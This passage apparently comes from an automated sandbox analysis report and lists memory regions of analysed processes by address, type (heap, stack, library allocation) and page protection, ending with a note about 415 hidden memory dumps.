page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34653000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B0907A9000
|
trusted library allocation
|
page read and write
|
||
|
1B08FB63000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
|
757C5FE000
|
stack
|
page read and write
|
||
|
757C8FE000
|
stack
|
page read and write
|
||
|
1FE93BF0000
|
heap
|
page execute and read and write
|
||
|
7FFD347E2000
|
trusted library allocation
|
page read and write
|
||
|
1A97F443000
|
heap
|
page read and write
|
||
|
7FFD349D1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34654000
|
trusted library allocation
|
page read and write
|
||
|
757C6F7000
|
stack
|
page read and write
|
||
|
1FE95B31000
|
trusted library allocation
|
page read and write
|
||
|
82DC1FF000
|
stack
|
page read and write
|
||
|
1A97F5A8000
|
heap
|
page read and write
|
||
|
1A97F4AB000
|
heap
|
page read and write
|
||
|
1FEADAC0000
|
heap
|
page read and write
|
||
|
1FE93909000
|
heap
|
page read and write
|
||
|
1A97F7EC000
|
heap
|
page read and write
|
||
|
1B08D73A000
|
heap
|
page read and write
|
||
|
1A97F4A3000
|
heap
|
page read and write
|
||
|
1FEAD973000
|
heap
|
page read and write
|
||
|
82DC3FD000
|
stack
|
page read and write
|
||
|
4180AFE000
|
stack
|
page read and write
|
||
|
4180DFE000
|
stack
|
page read and write
|
||
|
1B090E2B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346F6000
|
trusted library allocation
|
page read and write
|
||
|
1B090E2F000
|
trusted library allocation
|
page read and write
|
||
|
1B08D9F0000
|
trusted library allocation
|
page read and write
|
||
|
1B08D6FA000
|
heap
|
page read and write
|
||
|
1A97D750000
|
heap
|
page read and write
|
||
|
1A97F5C3000
|
heap
|
page read and write
|
||
|
1A97F7F1000
|
heap
|
page read and write
|
||
|
1A97F6F3000
|
heap
|
page read and write
|
||
|
1B0A0747000
|
trusted library allocation
|
page read and write
|
||
|
1A97F741000
|
heap
|
page read and write
|
||
|
1FE93948000
|
heap
|
page read and write
|
||
|
77C000
|
stack
|
page read and write
|
||
|
7FFD3464D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page execute and read and write
|
||
|
4180E79000
|
stack
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
1A97F4A8000
|
heap
|
page read and write
|
||
|
1A97F498000
|
heap
|
page read and write
|
||
|
4181D0D000
|
stack
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
1FE95951000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
1A97F80E000
|
heap
|
page read and write
|
||
|
1A97F5B8000
|
heap
|
page read and write
|
||
|
1A97F55D000
|
heap
|
page read and write
|
||
|
1A97F483000
|
heap
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
1FE9594B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
1FE93AF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
4180BFE000
|
stack
|
page read and write
|
||
|
1FE93988000
|
heap
|
page read and write
|
||
|
1B08DA60000
|
heap
|
page execute and read and write
|
||
|
1B090AC3000
|
trusted library allocation
|
page read and write
|
||
|
1B08D8C0000
|
heap
|
page read and write
|
||
|
1A97F4BC000
|
heap
|
page read and write
|
||
|
1FE95931000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
1B09F731000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
1A97F6F3000
|
heap
|
page read and write
|
||
|
1A97F6D1000
|
heap
|
page read and write
|
||
|
1A97F444000
|
heap
|
page read and write
|
||
|
82DC5FE000
|
stack
|
page read and write
|
||
|
1FE93900000
|
heap
|
page read and write
|
||
|
1A97F493000
|
heap
|
page read and write
|
||
|
1B0A7867000
|
heap
|
page execute and read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
757C47E000
|
stack
|
page read and write
|
||
|
1A97F472000
|
heap
|
page read and write
|
||
|
1A97F7E9000
|
heap
|
page read and write
|
||
|
1B08D960000
|
trusted library allocation
|
page read and write
|
There are 415 hidden memdumps, click here to show them.